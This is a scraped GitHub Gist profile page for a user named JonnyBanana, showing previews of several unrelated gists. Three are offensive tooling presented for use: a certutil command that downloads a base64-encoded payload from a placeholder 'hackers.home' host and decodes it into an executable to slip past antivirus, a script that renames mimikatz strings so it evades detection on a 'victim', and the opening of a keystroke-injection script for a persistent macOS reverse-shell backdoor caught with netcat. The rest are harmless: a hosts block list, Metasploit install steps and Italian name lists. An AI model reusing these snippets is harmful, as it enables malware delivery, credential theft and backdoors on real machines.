Skip to content

Instantly share code, notes, and snippets.

View JonnyBanana's full-sized avatar
🔥
Working from SapsLab

Jonny Banana JonnyBanana

🔥
Working from SapsLab
  • SappohSamaWorkshop - Circuit Circus
  • Bologna - Italy
View GitHub Profile
# certutil.exe bypass av on download + base64 Decoding
#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file
#into the executable. https://www.browserling.com/tools/file-to-base64
#This is illustrated in Xavier Mertens handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
EM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
@JonnyBanana
JonnyBanana / microsoft-dns-block.txt
Created February 9, 2021 00:51 — forked from VirtuBox/microsoft-dns-block.txt
Blocking Microsoft DNS hosts file
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 search.msn.com
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msn.com
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.rad.msn.com

Image source

https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png

Try resize it!

  • ![](https://gyazo.com/eb5c5741b6a9a16c692170a41a49c858.png | width=100)
This post links my 3Box profile to my Github account! Web3 social profiles by 3Box.
✅ did:3:bafyreib6e6as6gg5p6wqeulknfjaek4kobhp4z7ee4u2ox2xgjpqehr2me ✅
Create your profile today to start building social connection and trust online at https://3Box.io/
@JonnyBanana
JonnyBanana / gist:d0a6d5b39c932614d100618354ad226f
Created November 19, 2019 02:10 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
@JonnyBanana
JonnyBanana / cognomi.txt
Created November 18, 2019 01:56 — forked from pdesterlich/cognomi.txt
lista cognomi italiani
-- DISCLAIMER --
il presente elenco consiste in una raccolta di cognomi presenti sul territorio italiano (non necessariamente "italiani")
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo
è pertanto altamente possibile che ci siano errori o refusi
non è ne pretende di essere un elenco omnicomprensivo di tutti i cognomi esistenti
----------------
abbondanza
abu
accadia
@JonnyBanana
JonnyBanana / nomi_italiani.txt
Created November 18, 2019 01:55 — forked from pdesterlich/nomi_italiani.txt
lista nomi italiani
-- DISCLAIMER --
il presente elenco consiste in una raccolta di nomi presenti sul territorio italiano (non necessariamente "italiani")
viene generato prendendo processando automaticamente uno o più archivi anagrafici e non è controllato in alcun modo
è pertanto altamente possibile che ci siano errori o refusi
non è nè pretende di essere un elenco omnicomprensivo di tutti i nomi esistenti
----------------
abaco
abbondanza
abbondanzia
# script by JonnyBanana
#https://github.com/JonnyBanana
# this simple script asks to assign a name to a variable
#and then asks how many variables it must print on the monitor
# the output is like:
# a1 = ''
# a2 = ''
# a3 = ''
# a4 = ''
# a5 = ''